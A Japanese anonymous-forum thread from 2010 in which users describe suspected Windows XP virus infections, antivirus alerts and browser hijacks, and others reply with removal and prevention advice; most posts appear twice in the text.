現状でウィルスに感染したわけではないんですが質問させていただきます。
@暴露型ウィルスに感染した場合でPCの中にあるファイルを勝手にアップされた場合どこにいくんですか?
Aファイル共有ソフトを使ってる場合Winy上に流れたと聞きますがファイル共有ソフトを使ってない場合どこに流れるのでしょうか?
Bまたこれらの暴露型にウィルスに感染した場合はPC内にある著作物ファイル
(レンタルしてコピーした音楽・動画、吸い出したゲームRom・ISO・CSO、裁断して取り込んだ本や漫画など)
が実際にネット上に流出することはありえるのでしょうか?そして流出した場合でも罪に問われるのでしょうか?
@暴露型ウィルスに感染した場合でPCの中にあるファイルを勝手にアップされた場合どこにいくんですか?
Aファイル共有ソフトを使ってる場合Winy上に流れたと聞きますがファイル共有ソフトを使ってない場合どこに流れるのでしょうか?
Bまたこれらの暴露型にウィルスに感染した場合はPC内にある著作物ファイル
(レンタルしてコピーした音楽・動画、吸い出したゲームRom・ISO・CSO、裁断して取り込んだ本や漫画など)
が実際にネット上に流出することはありえるのでしょうか?そして流出した場合でも罪に問われるのでしょうか?
513 :名無しさん@お腹いっぱい。:2010/08/09(月) 03:50:25
午前3時前から、音楽が流れてきました。
ミュートにすると音は聞こえなくなったので、PCからの音と確信したのですが
このときIEも何もウィンドウの開くソフトは起動させていなかったんです。
音楽はしっかりとしたメロディの曲でした。タララララララン・・・みたいな曲です。
どなたか助けてください
ミュートにすると音は聞こえなくなったので、PCからの音と確信したのですが
このときIEも何もウィンドウの開くソフトは起動させていなかったんです。
音楽はしっかりとしたメロディの曲でした。タララララララン・・・みたいな曲です。
どなたか助けてください
514 :名無しさん@お腹いっぱい。:2010/08/11(水) 11:36:15
ニコニコ動画のおいしい朝食の作り方ってやつ
タグ見るとウィルスっぽいんだけどあれ本当?
タグ見るとウィルスっぽいんだけどあれ本当?
515 :名無しさん@お腹いっぱい。:2010/08/12(木) 04:17:38
セキュリティー対策ツールが疑わしい変更を検出しました。「選択した変更を元に戻す」
処理をした方がいいですか?
詳細情報:
システム変更
危険度: 低
説明:
個人情報などを収集する可能性のあるプログラムがコンピュータのメモリ上で実行されています。
詳細:
パス: C:\WINDOWS\SoftwareDistribution\Download\Install
ファイル名: windows-kb890830-v3.10-delta.exe
推奨:
疑いはありますが、このソフトウェアまたは変更は正規のものである可能性があります。この疑わしい問題を処理する前に、さらに調査してください。
処理をした方がいいですか?
詳細情報:
システム変更
危険度: 低
説明:
個人情報などを収集する可能性のあるプログラムがコンピュータのメモリ上で実行されています。
詳細:
パス: C:\WINDOWS\SoftwareDistribution\Download\Install
ファイル名: windows-kb890830-v3.10-delta.exe
推奨:
疑いはありますが、このソフトウェアまたは変更は正規のものである可能性があります。この疑わしい問題を処理する前に、さらに調査してください。
516 :名無しさん@お腹いっぱい。:2010/08/15(日) 04:02:24
最近パソコンが重いと思っていたら、updpxe32とise32というやつに
知らない間に感染していた。アンチウイルスソフトのavastを入れて
あったが感染していた。cureit,spybot,ad-awareでチェックしたが、
どれでも検出できなかった。セーフモードでファイル名で検索して
出てきたファイルを除いて、レジストリも検索して出てきた中の
それらしいのを削除して駆除できた。
知らない間に感染していた。アンチウイルスソフトのavastを入れて
あったが感染していた。cureit,spybot,ad-awareでチェックしたが、
どれでも検出できなかった。セーフモードでファイル名で検索して
出てきたファイルを除いて、レジストリも検索して出てきた中の
それらしいのを削除して駆除できた。
517 :名無しさん@お腹いっぱい。:2010/08/15(日) 10:39:24
★質問用テンプレ★
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ノーガード」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「security toolというマルウェア?に感染しました。システムの復元で3日前に戻して事なきをえたのですが
感染経路がわからず、また感染するのかと不安です。ここ最近ずっと2chと特定サイトの巡回ぐらいしかPCを使用してなかったので
何かいい予防があれば教えていただきたいです。」
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ノーガード」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「security toolというマルウェア?に感染しました。システムの復元で3日前に戻して事なきをえたのですが
感染経路がわからず、また感染するのかと不安です。ここ最近ずっと2chと特定サイトの巡回ぐらいしかPCを使用してなかったので
何かいい予防があれば教えていただきたいです。」
518 :名無しさん@お腹いっぱい。:2010/08/15(日) 15:36:51
ノーガードのくせに
何が良い予防はありませんかだよw
何が良い予防はありませんかだよw
519 :名無しさん@お腹いっぱい。:2010/08/15(日) 23:46:26
>>513みたいな感じで、不定期に音楽が流れるんだけどこれはウィルスなのでしょうか・・・?
映画のような音楽です
最新版のMicrosoft Security Essentialsでも消えませんでした
映画のような音楽です
最新版のMicrosoft Security Essentialsでも消えませんでした
520 :名無しさん@お腹いっぱい。:2010/08/16(月) 01:51:06
★質問用テンプレ★
【使用OS】 「XP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンはされていないんですが 1時間おきに女の声でスピーカーから声が流れてきます。
ほう・・・たいしたやつだ とかアニメ声で。マクロウイルスの類だと思いますけど
対処方法を教えていただきたいです。
【使用OS】 「XP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンはされていないんですが 1時間おきに女の声でスピーカーから声が流れてきます。
ほう・・・たいしたやつだ とかアニメ声で。マクロウイルスの類だと思いますけど
対処方法を教えていただきたいです。
521 :名無しさん@お腹いっぱい。:2010/09/09(木) 12:56:25
家庭内でのファイルの置き場所として、友人向けのFTPサーバーとして動作してるファイルサーバーがあるんだけど、
このPCはメンテナンスで設定を弄ることはあってもネットを見たりファイルを開いたりすることは無く、
そういった場合はウィルスに感染する事はある?
自分の認識では問題のファイルを開いたり何か仕込まれたサイトを見たりすると感染するイメージがあるんだけど、
どこかからか勝手にウィルスがぶち込まれたりするもんなの?
P2Pとかの通信でウィルスに感染したりとか言うのは聞いた事はあるんだけどそれだけで感染するもんなのかな。
このPCはメンテナンスで設定を弄ることはあってもネットを見たりファイルを開いたりすることは無く、
そういった場合はウィルスに感染する事はある?
自分の認識では問題のファイルを開いたり何か仕込まれたサイトを見たりすると感染するイメージがあるんだけど、
どこかからか勝手にウィルスがぶち込まれたりするもんなの?
P2Pとかの通信でウィルスに感染したりとか言うのは聞いた事はあるんだけどそれだけで感染するもんなのかな。
522 :名無しさん@お腹いっぱい。:2010/09/16(木) 13:05:47
【使用OS】 xp
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 「Avira AntiVir Personal
製品バージョン 9.0.0.25 2010/06/10
検索エンジン 8.02.04.52 2010/09/13
ウイルス定義ファイル 7.10.11.187 2010/09/15
コントロール センター 9.00.00.20 2009/12/03
Config Center 9.00.00.21 2009/12/03
Luke Filewalker 9.00.03.10 2009/12/03
AntiVir Guard 9.00.01.32 2009/07/21
フィルタ 9.00.03.17 2009/11/25
スケジューラ 9.00.00.09 2009/05/13
アップデータ 9.00.00.52 2009/12/03
」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
windows\system32\drivers\eesfru.sys
windows\system32\drivers\jiqvm.sys
この二つがトロイに感染しているようなのですが、ググっても何もひっかからず
削除もできません
分かる方居たら教えてください
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 「Avira AntiVir Personal
製品バージョン 9.0.0.25 2010/06/10
検索エンジン 8.02.04.52 2010/09/13
ウイルス定義ファイル 7.10.11.187 2010/09/15
コントロール センター 9.00.00.20 2009/12/03
Config Center 9.00.00.21 2009/12/03
Luke Filewalker 9.00.03.10 2009/12/03
AntiVir Guard 9.00.01.32 2009/07/21
フィルタ 9.00.03.17 2009/11/25
スケジューラ 9.00.00.09 2009/05/13
アップデータ 9.00.00.52 2009/12/03
」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
windows\system32\drivers\eesfru.sys
windows\system32\drivers\jiqvm.sys
この二つがトロイに感染しているようなのですが、ググっても何もひっかからず
削除もできません
分かる方居たら教えてください
523 :名無しさん@お腹いっぱい。:2010/09/17(金) 13:16:18
>>522
「検出されたウイルス名」がないが
Aviraでは検出されないってことか?
おそらくその二つのファイル名はランダムなものだから
ググっても出てこない可能性が高い
まず >>9 や↓VirusTotalでウイルスの種類を特定しないことには先に進まない
ttp://www.virustotal.com/
痕跡が残ってるかもしれないのでAviraで
システムドライブをフルスキャンすることから始めたら?
まあ最近のウイルスはリカバリしたほうが早いと思うがなー
「検出されたウイルス名」がないが
Aviraでは検出されないってことか?
おそらくその二つのファイル名はランダムなものだから
ググっても出てこない可能性が高い
まず >>9 や↓VirusTotalでウイルスの種類を特定しないことには先に進まない
ttp://www.virustotal.com/
痕跡が残ってるかもしれないのでAviraで
システムドライブをフルスキャンすることから始めたら?
まあ最近のウイルスはリカバリしたほうが早いと思うがなー
524 :名無しさん@お腹いっぱい。:2010/09/23(木) 02:52:22
a
525 :名無しさん@お腹いっぱい。:2010/10/08(金) 23:43:12
アイコンをクリックすると自動でクリック連打してる状態になって連射機みたいになってタブが大量にでてくるんですがウィルスですか?
526 :名無しさん@お腹いっぱい。:2010/10/15(金) 01:10:15
527 :名無しさん@お腹いっぱい。:2010/10/16(土) 13:56:36
ttp://www.namamakkori.com/
アクセスすると別のサイトに飛ばされて
そのサイトに英語であなたはハッキングされました
みたなことが書かれてます
PCをウィルスバスターでスキャンしましたがウィルスは
検出されなかったです
サイト表示してる間PC内の情報抜かれたりしてるんでしょうか
アクセスすると別のサイトに飛ばされて
そのサイトに英語であなたはハッキングされました
みたなことが書かれてます
PCをウィルスバスターでスキャンしましたがウィルスは
検出されなかったです
サイト表示してる間PC内の情報抜かれたりしてるんでしょうか
528 :名無しさん@お腹いっぱい。:2010/10/16(土) 16:00:51
さっき見たらもう飛ばなくなってた
何かインドネシア語みたいなサイトが出てきてたんですが
何かインドネシア語みたいなサイトが出てきてたんですが
529 :名無しさん@お腹いっぱい。:2010/10/17(日) 10:48:53
ウィルスの種類がいろいろあってどのソフトを入れていると安全かわかりません。
今、panda cloud antivirusとspybotはいれているんですが、これで大丈夫でしょうか?
ウィルスバスターとかは総合的にカバーできるイメージでいいんでしょうか?
今、panda cloud antivirusとspybotはいれているんですが、これで大丈夫でしょうか?
ウィルスバスターとかは総合的にカバーできるイメージでいいんでしょうか?
530 :名無しさん@お腹いっぱい。:2010/10/17(日) 16:35:24
>>529
すでにセキュリティソフトだけで安全を買える情勢ではない
それより下記の使っていないものはアンインストールをした上で
まめにアップデートしてセキュリティーホールを潰しておく方がいい
あとクラウド製品だけでは心もとないのでフリーでもかまわないから
普通のウイルス対策ソフトは入れておくべき
まあセキュリティに関して詳しくないなら素直に有料の製品を導入した方がいいな
Windows Update / Microsoft Update
PDF Reader (Adobe Reader、Acrobatなど)
Adobe Flash Player
Adobe Shockwave Player
Adobe AIR
Java Runtime Environment (Javascriptにあらず)
QuickTime
RealPlayer
すでにセキュリティソフトだけで安全を買える情勢ではない
それより下記の使っていないものはアンインストールをした上で
まめにアップデートしてセキュリティーホールを潰しておく方がいい
あとクラウド製品だけでは心もとないのでフリーでもかまわないから
普通のウイルス対策ソフトは入れておくべき
まあセキュリティに関して詳しくないなら素直に有料の製品を導入した方がいいな
Windows Update / Microsoft Update
PDF Reader (Adobe Reader、Acrobatなど)
Adobe Flash Player
Adobe Shockwave Player
Adobe AIR
Java Runtime Environment (Javascriptにあらず)
QuickTime
RealPlayer
531 :名無しさん@お腹いっぱい。:2010/10/20(水) 10:46:11
ソフトのバージョンチェックが面倒ならSecuniaPSI入れとけば
バージョンチェックが楽
更新してない・最新版じゃない場合教えてくれる
バージョンチェックが楽
更新してない・最新版じゃない場合教えてくれる
532 :名無しさん@お腹いっぱい。:2010/10/21(木) 07:03:33
【使用OS】 WinXP SP3
【Microsoft Update(MU)の状態】 優先度の高い更新プログラム は無し
【使用セキュリティソフトとバージョン】 カスペルスキーインターネットセキュリティ2010 バージョン9.0.0.736
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 されている
【スパイウェア対策ソフト】 カスペ以外なし
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Foxitソフトウェアベスト—PDFリーダーのページからモデル
http://www●foxitsoftware.com/japan/ebook/promotion.php
を見たらウィルスが検出されました
詳細レポートには
2010/10/21 06:12:03 ウェブアンチウイルス 禁止しました: Trojan-Downloader.HTML.Small.as Opera Internet Browser
http://www●foxitsoftware.com/japan/ebook/promotion.php//promotion
と書かれてありウィルスの説明はまだありませんし ttp://www.viruslistjp.com/search?VN=Trojan-Downloader.HTML.Small.as
最近のもののようですが ttp://www.kaspersky.co.jp/viruswatchlite?search_virus=html&hour_offset=5&x=7&y=7
このウィルスはどんな効果があるのでしょうか?
【Microsoft Update(MU)の状態】 優先度の高い更新プログラム は無し
【使用セキュリティソフトとバージョン】 カスペルスキーインターネットセキュリティ2010 バージョン9.0.0.736
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 されている
【スパイウェア対策ソフト】 カスペ以外なし
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Foxitソフトウェアベスト—PDFリーダーのページからモデル
http://www●foxitsoftware.com/japan/ebook/promotion.php
を見たらウィルスが検出されました
詳細レポートには
2010/10/21 06:12:03 ウェブアンチウイルス 禁止しました: Trojan-Downloader.HTML.Small.as Opera Internet Browser
http://www●foxitsoftware.com/japan/ebook/promotion.php//promotion
と書かれてありウィルスの説明はまだありませんし ttp://www.viruslistjp.com/search?VN=Trojan-Downloader.HTML.Small.as
最近のもののようですが ttp://www.kaspersky.co.jp/viruswatchlite?search_virus=html&hour_offset=5&x=7&y=7
このウィルスはどんな効果があるのでしょうか?
533 :名無しさん@お腹いっぱい。:2010/10/22(金) 21:38:13
価格○ムを見ている時、価格順並べ替えボタンをクリックしたらPCが勝手に終了しました。
キーボードには触れておらず操作ミスで電源を落としたとは考えられません
今AVGのウィルスソフトでPCスキャンをかけていますが、似たような経験、状況をご存知の方います?
ググったら「価格.com経由で拡散したウイルス、Windowsの既知の脆弱性を悪用」こんなの見つけたので不安です
キーボードには触れておらず操作ミスで電源を落としたとは考えられません
今AVGのウィルスソフトでPCスキャンをかけていますが、似たような経験、状況をご存知の方います?
ググったら「価格.com経由で拡散したウイルス、Windowsの既知の脆弱性を悪用」こんなの見つけたので不安です
534 :名無しさん@お腹いっぱい。:2010/10/22(金) 21:48:48
535 :名無しさん@お腹いっぱい。:2010/10/22(金) 22:00:05
>>532の方とまったく同じ症状です・・・
カスペのHPにも特に情報があがってないみたいだし、本スレでも話題にあがってない…
しかも、脅威検出→削除→なぜかまた検出
で一向に数がへらない。
どなたかわかる方ご教授願います。
カスペのHPにも特に情報があがってないみたいだし、本スレでも話題にあがってない…
しかも、脅威検出→削除→なぜかまた検出
で一向に数がへらない。
どなたかわかる方ご教授願います。
536 :名無しさん@お腹いっぱい。:2010/10/22(金) 22:23:20
>>535
>>532 の時点でカスペエンジンのサイトチェッカーaguseでは
確かに同じウイルスが検出されていたが今は反応がない
Dr.Webでもクリーン判定
ttp://online.us.drweb.com/cache/?i=bea659631d9ffb867cdcaf0c44b6b984
VirusTotalのフィッシングチェッカー結果
Webscan result: 0 /6 (0.0%)
ttp://www.virustotal.com/url-scan/report.html?id=c917cf81ef039420ce03f116d94189a1-1287637448
ついでにavast!のWebシールドにも反応はなかった
↓ここにリダイレクトされていたが、自分は何らかの誤検出だと思っている
ttp://www●foxitsoftware.com/campaign/eslick_promotion_jp/index.html
>>532 の時点でカスペエンジンのサイトチェッカーaguseでは
確かに同じウイルスが検出されていたが今は反応がない
Dr.Webでもクリーン判定
ttp://online.us.drweb.com/cache/?i=bea659631d9ffb867cdcaf0c44b6b984
VirusTotalのフィッシングチェッカー結果
Webscan result: 0 /6 (0.0%)
ttp://www.virustotal.com/url-scan/report.html?id=c917cf81ef039420ce03f116d94189a1-1287637448
ついでにavast!のWebシールドにも反応はなかった
↓ここにリダイレクトされていたが、自分は何らかの誤検出だと思っている
ttp://www●foxitsoftware.com/campaign/eslick_promotion_jp/index.html
537 :名無しさん@お腹いっぱい。:2010/11/02(火) 14:28:55
さきほどあファイルをDLしました
ウィルスチェックしたところ、悪意のファイルはないとのことでしたが
安心してダブルクリックしてインストール完了したところ
ウイルス 2010-11-02 13:40:24 C:\PROGRAM FILES\GRAVITY\RO\NEONCUBE\CREATE.EXEファイルにウィルスを発見 Win32.Troj.Agent.(kcloud) 処理成功(操作:削除)
と、インストールが完了した瞬間、、、トロイが発見されました・・・
処理成功と書かれているので、安心していいのでしょうか
ウィルスチェックしたところ、悪意のファイルはないとのことでしたが
安心してダブルクリックしてインストール完了したところ
ウイルス 2010-11-02 13:40:24 C:\PROGRAM FILES\GRAVITY\RO\NEONCUBE\CREATE.EXEファイルにウィルスを発見 Win32.Troj.Agent.(kcloud) 処理成功(操作:削除)
と、インストールが完了した瞬間、、、トロイが発見されました・・・
処理成功と書かれているので、安心していいのでしょうか
538 :名無しさん@お腹いっぱい。:2010/11/02(火) 14:29:45
>さきほどあファイルをDLしました
さきほどあるファイルをDLしました
さきほどあるファイルをDLしました
539 :名無しさん@お腹いっぱい。:2010/11/05(金) 01:18:43
一番使えるウィルスセキュリティってなんですか?
540 :名無しさん@お腹いっぱい。:2010/11/05(金) 22:43:13
【使用OS】 WindowsXP SP2
【Microsoft Update(MU)の状態】 恐らく最新
【使用セキュリティソフトとバージョン】 なし
ここ最近友人からWindowsLiveメッセンジャーにて
俺がオフラインなのに
「 原价350,=价95元!♂タ斯&ィ活==泥面膜,去K§a角=C淡化痘=C改善=,=的皮%_亮整个冬天!
www.sinatuan.info/team.php?id=YTNjg=」
*安全のためアドレス先頭削ってあります
というメッセージが飛んでくると言われ例のメッセウイルスに今頃かかっちゃったかと
Malwarebytes' Anti-Malwareでスキャンしてみたものの反応せず
ググって出てくるメッセウイルスの対策のjusched.exeの削除も何故かjusched.exeが見つからないとかで出来ず
そもそも他人に送りつけるメッセージが当時流行ったのと違い英文でなく中文で
ひょっとしたら新種・亜種にかかってしまったのか?と不安になっています。
(アドレスでググっても何も引っかからないし)
どなたかこれの対策分かる人いらっしゃいませんか?
【Microsoft Update(MU)の状態】 恐らく最新
【使用セキュリティソフトとバージョン】 なし
ここ最近友人からWindowsLiveメッセンジャーにて
俺がオフラインなのに
「 原价350,=价95元!♂タ斯&ィ活==泥面膜,去K§a角=C淡化痘=C改善=,=的皮%_亮整个冬天!
www.sinatuan.info/team.php?id=YTNjg=」
*安全のためアドレス先頭削ってあります
というメッセージが飛んでくると言われ例のメッセウイルスに今頃かかっちゃったかと
Malwarebytes' Anti-Malwareでスキャンしてみたものの反応せず
ググって出てくるメッセウイルスの対策のjusched.exeの削除も何故かjusched.exeが見つからないとかで出来ず
そもそも他人に送りつけるメッセージが当時流行ったのと違い英文でなく中文で
ひょっとしたら新種・亜種にかかってしまったのか?と不安になっています。
(アドレスでググっても何も引っかからないし)
どなたかこれの対策分かる人いらっしゃいませんか?
541 :名無しさん@お腹いっぱい。:2010/11/06(土) 15:34:32
MSNアカウントが乗っ取られてるんじゃないの
542 :名無しさん@お腹いっぱい。:2010/11/08(月) 16:13:03
使用OS XPSP3
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウィルスバスター 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「行っている」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
C:\System Volume Information\_restore{51B6498B-494D-43B5-BA1B-6C91D71E6403}\RP185\A0072792.dll
C:\System Volume Information\_restore{51B6498B-494D-43B5-BA1B-6C91D71E6403}\RP185\A0072820.exe
初なので怖いです 一応バスターのほうで削除はしました
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウィルスバスター 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「行っている」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
C:\System Volume Information\_restore{51B6498B-494D-43B5-BA1B-6C91D71E6403}\RP185\A0072792.dll
C:\System Volume Information\_restore{51B6498B-494D-43B5-BA1B-6C91D71E6403}\RP185\A0072820.exe
初なので怖いです 一応バスターのほうで削除はしました
543 :名無しさん@お腹いっぱい。:2010/11/08(月) 23:24:03
職場で先方から届いたメールの添付ファイルについてたワームが
ウィルスバスターにより発見され、「隔離」されました。
ファイルの実行、開封はしてません。
…総務課がパソコン持って行って業者に1週間預けて初期化させたんですけど
そこまでやる必要あるんでしょうか。
余談ですが初期化後のフォローがなっていないのか
業務システムがぶち壊れて帰ってきました。
ウィルスバスターにより発見され、「隔離」されました。
ファイルの実行、開封はしてません。
…総務課がパソコン持って行って業者に1週間預けて初期化させたんですけど
そこまでやる必要あるんでしょうか。
余談ですが初期化後のフォローがなっていないのか
業務システムがぶち壊れて帰ってきました。
544 :名無しさん@お腹いっぱい。:2010/11/10(水) 17:37:12
ウィルスで
「ソャー Gクカトマ
ソャー 11ヶ
ソヤー ソチシヌ」
とかいうのってありますか?お気に入りにいつのまにか入ってて
消しても次の日にはまたお気に入りにあるんですが・・・
パソコンにはウィルスバスター入れてるけどもしかしたら
間違って消してるかもしれません
「ソャー Gクカトマ
ソャー 11ヶ
ソヤー ソチシヌ」
とかいうのってありますか?お気に入りにいつのまにか入ってて
消しても次の日にはまたお気に入りにあるんですが・・・
パソコンにはウィルスバスター入れてるけどもしかしたら
間違って消してるかもしれません
545 :名無しさん@お腹いっぱい。:2010/11/10(水) 17:38:07
ageてしまいました すみません
546 :名無しさん@お腹いっぱい。:2010/11/11(木) 01:34:17
質問させてください。
1ヶ月ほど前からPCが不安定でして。突然電源が落ちます。
何度か経験して気が付いたのですが、
「Delete」キーを押したタイミングで落ちます。
原因の一番に考えられるのは電源系の不調。
もしくはマザボのコンデンサなどのハード面だと思うのですが、
このように反応をするウィルスって聞いたことありますか?
1ヶ月ほど前からPCが不安定でして。突然電源が落ちます。
何度か経験して気が付いたのですが、
「Delete」キーを押したタイミングで落ちます。
原因の一番に考えられるのは電源系の不調。
もしくはマザボのコンデンサなどのハード面だと思うのですが、
このように反応をするウィルスって聞いたことありますか?
547 :名無しさん@お腹いっぱい。:2010/11/11(木) 16:00:37
【使用OS】 XPでIE6
【Microsoft Update(MU)の状態】 あまりやってない
【使用セキュリティソフトとバージョン】 未導入
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 未導入
【スパイウェア対策ソフト】 未導入
【スパイウェア対策ソフトの更新は定期的に行なっているか】 未導入
【ルータの有無】 無線LANだからルータはあるはず
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】 スキャンしてない
エロ系ブログを閲覧中に突然IEがホップアップを開始しwindowsインストーラが起動し
慌てて電源を切ったものの既に遅く中国系ソフトウェアが入ってました。
IEを乗っ取るようでデスクトップのIEのアイコンやホームなどが中国系にカスタマイズされています。
IEMAOとかいうプログラムがsystemとして起動してるのがタスクマネジャで確認できます。
レジストリをいじってautorunとか調整しようとしたら
「レジストリは管理者により使用不可に設定されています」でいじれず。
セーフモードで起動するとその途中でerror happenedみたいなブルースクリーンになり進まず。
IEを起動すると中国サイトにアクセスしてセクシー画像を表示しプログラムのインストールが図られる。
ウイルス対策ソフトウェアを購入して使用すればこのようなスパイウェアなどのプログラムも除去できますでしょうか?
手動での除去には限界を感じています。セーフモードで起動できないってちょっとね。
【Microsoft Update(MU)の状態】 あまりやってない
【使用セキュリティソフトとバージョン】 未導入
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 未導入
【スパイウェア対策ソフト】 未導入
【スパイウェア対策ソフトの更新は定期的に行なっているか】 未導入
【ルータの有無】 無線LANだからルータはあるはず
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】 スキャンしてない
エロ系ブログを閲覧中に突然IEがホップアップを開始しwindowsインストーラが起動し
慌てて電源を切ったものの既に遅く中国系ソフトウェアが入ってました。
IEを乗っ取るようでデスクトップのIEのアイコンやホームなどが中国系にカスタマイズされています。
IEMAOとかいうプログラムがsystemとして起動してるのがタスクマネジャで確認できます。
レジストリをいじってautorunとか調整しようとしたら
「レジストリは管理者により使用不可に設定されています」でいじれず。
セーフモードで起動するとその途中でerror happenedみたいなブルースクリーンになり進まず。
IEを起動すると中国サイトにアクセスしてセクシー画像を表示しプログラムのインストールが図られる。
ウイルス対策ソフトウェアを購入して使用すればこのようなスパイウェアなどのプログラムも除去できますでしょうか?
手動での除去には限界を感じています。セーフモードで起動できないってちょっとね。
548 :名無しさん@お腹いっぱい。:2010/11/11(木) 17:55:42
>>547
これか?
サービスで動作しているようだから止めてからなら駆除可能かも
しかし他にも複数動いているようだな
ttp://www.securelist.com/en/descriptions/7624112/Trojan.Win32.Delf.wta
同じものか分からんがMSEが対応してそうだ?
あとはMalwarebytes' Anti-Malwareでも走らせるとか
ttps://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Adware%3AWin32%2FIEMao.A&ThreatID=156509
駆除できたらここでも見て現在の最新版にアップデートしとけ
ttp://www.so-net.ne.jp/security/news/newstopics_201005.html
これか?
サービスで動作しているようだから止めてからなら駆除可能かも
しかし他にも複数動いているようだな
ttp://www.securelist.com/en/descriptions/7624112/Trojan.Win32.Delf.wta
同じものか分からんがMSEが対応してそうだ?
あとはMalwarebytes' Anti-Malwareでも走らせるとか
ttps://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Adware%3AWin32%2FIEMao.A&ThreatID=156509
駆除できたらここでも見て現在の最新版にアップデートしとけ
ttp://www.so-net.ne.jp/security/news/newstopics_201005.html
549 :名無しさん@お腹いっぱい。:2010/11/11(木) 22:07:10
>>548
多分それです。英文のページを読みましたがよくわかりませんでした。
とりあえず>>9でスキャンを3回試みるも3回ブルースクリーンになって終了する。
なぜだかモデムで有線LANでつないでるパソコンまでネットに接続できなくなり今に至る。
ウイルスがモデムに影響するなんてことは考えられるんだろうか。
これからどうしよう。電器屋で5000円で対策ソフト買うにしても
インターネットにつながずブルースクリーンにならず除去できるもんかわかんないわ。
多分それです。英文のページを読みましたがよくわかりませんでした。
とりあえず>>9でスキャンを3回試みるも3回ブルースクリーンになって終了する。
なぜだかモデムで有線LANでつないでるパソコンまでネットに接続できなくなり今に至る。
ウイルスがモデムに影響するなんてことは考えられるんだろうか。
これからどうしよう。電器屋で5000円で対策ソフト買うにしても
インターネットにつながずブルースクリーンにならず除去できるもんかわかんないわ。
550 :名無しさん@お腹いっぱい。:2010/11/11(木) 22:15:39
551 :名無しさん@お腹いっぱい。:2010/11/11(木) 22:45:24
>>549
オンラインスキャンはダメかもな
IE上で動かすことになるからマルウェア側が見越して監視してそうだ
最近のものは一度入り込むと素人ではどうにもならないことが多いので
正直リカバリを薦める
まあCD/USBブート可能なウイルス対策ソフトでスキャンするとか
他にPCがあるならHDDを取り外してそっちでスキャンかけるとか
方法はないでもないが(それでも駆除できる保証はないが)
フリーでCD/USBブート可能なもの
ttp://www.forest.impress.co.jp/docs/news/20100325_356718.html
ttp://drweb.jp/support/LiveCD.html
ここを見ると製品CDからブートできるのは
ノートン、G Dataあたりか?
ttp://plusd.itmedia.co.jp/pcuser/articles/1010/18/news093.html
オンラインスキャンはダメかもな
IE上で動かすことになるからマルウェア側が見越して監視してそうだ
最近のものは一度入り込むと素人ではどうにもならないことが多いので
正直リカバリを薦める
まあCD/USBブート可能なウイルス対策ソフトでスキャンするとか
他にPCがあるならHDDを取り外してそっちでスキャンかけるとか
方法はないでもないが(それでも駆除できる保証はないが)
フリーでCD/USBブート可能なもの
ttp://www.forest.impress.co.jp/docs/news/20100325_356718.html
ttp://drweb.jp/support/LiveCD.html
ここを見ると製品CDからブートできるのは
ノートン、G Dataあたりか?
ttp://plusd.itmedia.co.jp/pcuser/articles/1010/18/news093.html
552 :名無しさん@お腹いっぱい。:2010/11/11(木) 22:53:03
補足
>なぜだかモデムで有線LANでつないでるパソコンまでネットに接続できなくなり今に至る。
マルウェアの種類にもよるが
PC間でファイルの共有などをしているとLAN経由で感染も有り得る
